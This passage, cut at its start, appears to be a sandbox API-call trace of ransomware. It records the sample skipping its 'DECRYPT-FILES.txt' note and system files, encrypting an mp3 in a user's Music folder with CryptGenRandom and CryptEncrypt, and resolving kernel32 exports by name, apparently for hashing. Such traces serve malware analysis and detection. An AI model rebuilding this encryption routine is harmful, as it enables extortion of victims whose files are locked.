"c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\clv-4ix.mp3.o10v"), dwFlags=0x0) returned 1 [0085.713] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.713] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.714] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.714] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf43c9e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf43c9e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf43c9e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0085.714] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0085.714] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10b488b0, ftCreationTime.dwHighDateTime=0x1d4cf2a, ftLastAccessTime.dwLowDateTime=0x4be9d990, ftLastAccessTime.dwHighDateTime=0x1d4c9d9, ftLastWriteTime.dwLowDateTime=0x4be9d990, ftLastWriteTime.dwHighDateTime=0x1d4c9d9, nFileSizeHigh=0x0, nFileSizeLow=0xcb6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="dEyib6wB.mp3", cAlternateFileName="")) returned 1 [0085.714] lstrcmpiW (lpString1="dEyib6wB.mp3", lpString2="DECRYPT-FILES.txt") returned 1 [0085.714] lstrcmpiW (lpString1="dEyib6wB.mp3", lpString2="autorun.inf") returned 1 [0085.714] lstrcmpiW (lpString1="dEyib6wB.mp3", lpString2="boot.ini") returned 1 [0085.714] lstrcmpiW (lpString1="dEyib6wB.mp3", lpString2="desktop.ini") returned 1 [0085.714] lstrcmpiW (lpString1="dEyib6wB.mp3", lpString2="ntuser.dat") returned -1 [0085.714] lstrcmpiW (lpString1="dEyib6wB.mp3", lpString2="iconcache.db") returned -1 [0085.714] lstrcmpiW (lpString1="dEyib6wB.mp3", lpString2="bootsect.bak") returned 1 [0085.714] lstrcmpiW (lpString1="dEyib6wB.mp3", lpString2="ntuser.dat.log") returned -1 [0085.714] lstrcmpiW (lpString1="dEyib6wB.mp3", lpString2="thumbs.db") returned -1 [0085.714] lstrcmpiW (lpString1="dEyib6wB.mp3", lpString2="Bootfont.bin") returned 1 [0085.714] lstrlenW (lpString="dEyib6wB.mp3") returned 12 [0085.714] lstrcmpiW (lpString1="mp3", lpString2="lnk") returned 1 [0085.714] lstrcmpiW (lpString1="mp3", lpString2="exe") returned 1 [0085.714] lstrcmpiW (lpString1="mp3", lpString2="sys") returned -1 [0085.714] lstrcmpiW (lpString1="mp3", lpString2="dll") returned 1 [0085.714] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned 61 [0085.714] lstrlenW (lpString="dEyib6wB.mp3") returned 12 [0085.715] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" [0085.715] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpString2="dEyib6wB.mp3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\dEyib6wB.mp3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\dEyib6wB.mp3" [0085.715] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.715] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\dEyib6wB.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\deyib6wb.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0085.715] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=52074) returned 1 [0085.715] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0085.715] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.715] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.715] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.715] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.716] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0085.716] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.717] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.717] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.718] CloseHandle (hObject=0x43c) returned 1 [0085.718] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.718] WriteFile (in: hFile=0x438, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0085.719] CloseHandle (hObject=0x0) returned 0 [0085.719] CloseHandle (hObject=0x438) returned 1 [0085.719] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.719] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.719] GetTickCount () returned 0x114de2f [0085.719] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.719] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.720] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.720] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.720] lstrlenA (lpString="kernel32.dll") returned 12 [0085.720] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.720] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.720] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.720] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.720] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.720] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.720] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.720] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.720] lstrlenA (lpString="ADDATOMA") returned 8 [0085.720] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.720] lstrlenA (lpString="ADDATOMW") returned 8 [0085.720] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.720] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.721] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.721] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.721] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.721] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.721] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.721] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.721] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.721] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.721] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.721] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.721] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.721] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.721] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.721] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.721] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.721] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.721] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.721] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.721] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.721] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.721] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.721] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.721] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.721] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.721] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.721] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.721] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.721] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.721] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.721] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.721] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.721] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.721] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.721] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.721] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.721] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.721] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.722] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.722] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.722] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.722] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.722] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.722] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.722] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.722] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.722] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.722] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.722] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.722] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.722] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.722] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.722] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.722] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.722] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.722] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.722] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.722] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.722] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.722] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.722] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.722] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.722] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.722] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.722] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.722] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.722] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.722] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.722] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.722] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.722] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.722] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.722] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.722] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.723] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.723] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.723] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.723] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.723] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.723] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.723] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.723] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.723] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.723] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.723] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.723] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.723] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.723] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.723] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.723] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.723] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.723] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.723] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.723] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.723] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.723] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.723] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.723] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.723] lstrlenA (lpString="BEEP") returned 4 [0085.723] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.723] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.723] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.723] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.723] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.723] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.723] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.723] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.723] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.723] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.723] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.723] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.724] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.724] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.724] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.724] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.724] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.724] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.724] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.724] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.724] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.724] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.724] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.724] lstrlenA (lpString="CANCELIO") returned 8 [0085.724] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.724] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.724] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.724] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.724] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.724] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.724] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.724] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.724] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.724] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.724] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.724] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.724] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.724] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.724] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.724] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.724] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.724] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.724] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.724] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.724] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.724] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.724] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.724] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.724] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.725] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.725] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.725] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.725] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.725] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.725] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.725] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.725] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.725] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.725] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.725] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.725] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.725] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.725] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.725] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.725] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" 